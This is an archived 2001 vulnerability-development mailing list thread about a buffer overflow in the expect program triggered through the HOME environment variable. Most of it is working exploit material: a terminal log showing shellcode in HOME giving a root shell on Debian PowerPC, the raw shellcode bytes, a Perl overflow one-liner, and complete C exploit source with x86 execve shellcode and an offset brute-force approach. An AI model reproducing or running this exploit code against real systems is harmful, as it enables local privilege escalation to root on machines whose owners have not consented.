Vulnerability Development mailing list archives

Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]]

From: Charles Stevenson <core () ezlink com>
Date: Thu, 07 Jun 2001 19:52:55 -0600

F*#! i sent the wrong paste (lol)... yes the easiest expect exploit if it
was suid would be to call it directly... ;-)

here is the paste i meant to send

[-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
[ Buffer size:  512             Egg size:       2048    Aligment:       0]
[ Address:      0x100111f8      Offset:         0                        ]
sh-2.05$ export HOME=$EGG
sh-2.05$ id
uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05$ /usr/bin/expect
sh-2.05# id
uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05# ps
  PID TTY          TIME CMD
 1791 pts/5    00:00:00 sh
 1793 pts/5    00:00:00 ps
sh-2.05# exit
sh-2.05$ echo $HOME
ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2x/?ÿA¼|h¦°Ãÿµ°Ãÿ°Ãÿ?ÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx8?ð8¦ô8æó|¥"x|ç"x|?:|Ä®|Ä*|ç(P|?*|¤"|¤*|(P|e|cxDÿÿ|£+x|À3x|Æ2x|§:|¥*|c!.|f"|Å!.|¥*xDÿÿ|à;xDÿÿÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûxÿûx|Æ2xKÿþý/bin/shZÿÿÿÿÿÿÿÿ

Assigning the contents of $EGG to $HOME being the key... sorry folks about
the earlier blunder... ;-)

Best Regards,
Charles Stevenson

Charles Stevenson wrote:

Kevin,

Here's the PPC shellcode info you asked for:

This is mainly a post of my PowerPC exploit efforts... anyways... Just
for grins I tested a scenario under Debian PowerPC GNU/Linux with:

ii  expect5.31     5.31.8-3       A program that "talks" to other
programs.

[-(core@euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect

[-(core@euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect
-rwsr-xr-x    1 root     root         4328 Sep 20  2000 /usr/bin/expect
[-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512
[ Buffer size:  512             Egg size:       2048    Aligment:
0]
[ Address:      0x100111f8      Offset:         0
]
sh-2.05$ id
uid=1000(core) gid=1000(core)
groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05$ /usr/bin/expect
expect1.1> id
uid=1000(core) gid=1000(core) euid=0(root)
groups=1000(core),4(adm),24(cdrom),29(audio)
expect1.2>

If you find a program that calls expect suid let me know ;-)

Best Regards,
Charles Stevenson

P.S. the "reet" tools I wrote to add PowerPC support are based on Aleph
One's smashstack code.  It's available at:
http://www.ezlink.com/~core/files/reet.tar.gz (Comments welcome:)

I have found an overflow in and coded the exploit code for several
versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am
unable to think of a situation where this would be useful due to the
fact that expect is not suid...can anyone help me determine if this is
exploitable to obtain root? Perhaps a suid expect script could be
exploited? or maybe something like suid kppp which calls expect as a
helper program?

[root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
[root@linux elguapo]# expect
Segmentation fault (core dumped)

-Kevin Finisterre
dotslash () snosoft com
--------------54785D81E19EEAA4D65A5A40
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii;
 name="expect.c"
Content-Disposition: inline;
 filename="expect.c"

//krfinisterre () checkfree com or dotslash () snosoft com
//this is output from my brute script...
//722
//Stack pointer: 0xbffffa18
//       Offset: 0x2d3
//  Return addr: 0xbffff745
//stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
$3
$L
//723
//Stack pointer: 0xbffffa18
//       Offset: 0x2d4
//  Return addr: 0xbffff744
//sh-2.04#
//note that I was root when I ran this ... expect is not suid

#define BUFFERSIZE 533

unsigned long sp(void)
{
        __asm__("movl %esp, %eax");
}

int main(int argc,char **argv)
{
  char hell[] =
        "\x29\xc0"
        "\x29\xc0"
        "\xb0\x47"
        "\x29\xdb"
        "\xb3\x0c"
        "\x89\xd9"
        "\xcd\x80"
        "\x5e"
        "\x29\xc0"
        "\x88\x46\x07"
        "\x89\x46\x0c"
        "\x89\x76\x08"
        "\xb0\x0b"
        "\x87\xf3"
        "\x8d\x4b\x08"
        "\x8d\x53\x0c"
        "\xcd\x80"
        "\xe8\xe3\xff\xff\xff"
        "\x2f\x62\x69\x6e\x2f\x73\x68";
        int i;
        int offset;
        long esp;
        long ret;
        long *addr_ptr;
        char *buffer, *ptr;
        offset = atoi(argv[1]);
        esp = sp();
        ret = esp-offset;

        if(!(buffer = malloc(BUFFERSIZE)))
        {
                printf("oops\n");
                exit(-1);
        }

        ptr = buffer;
        addr_ptr = (long *)ptr;
        for (i=0; i<BUFFERSIZE; i+=4)
                *(addr_ptr++) = ret;

        for (i=0; i<BUFFERSIZE/2; i++)
                buffer[i] = '\xeb02';

        ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
        for(i=0; i<strlen(hell); i++)
                *(ptr++) = hell[i];

        buffer[BUFFERSIZE-1] = 0;

        setenv("HOME", buffer, 1);
        execlp("/usr/bin/expect", 0);
}

--------------54785D81E19EEAA4D65A5A40--

Current thread:

[Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] KF (Jun 05)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Kevin J. Menard, Jr. (Jun 05)
  - Re: [Returned Post...Expect overflows KF (Jun 05)
- Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Charles Stevenson (Jun 07)
  - Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]] Charles Stevenson (Jun 07)
    - Re: Returned post ... Expect overflows KF (Jun 08)
- Expect Overflow (Continued) Charles Stevenson (Jun 08)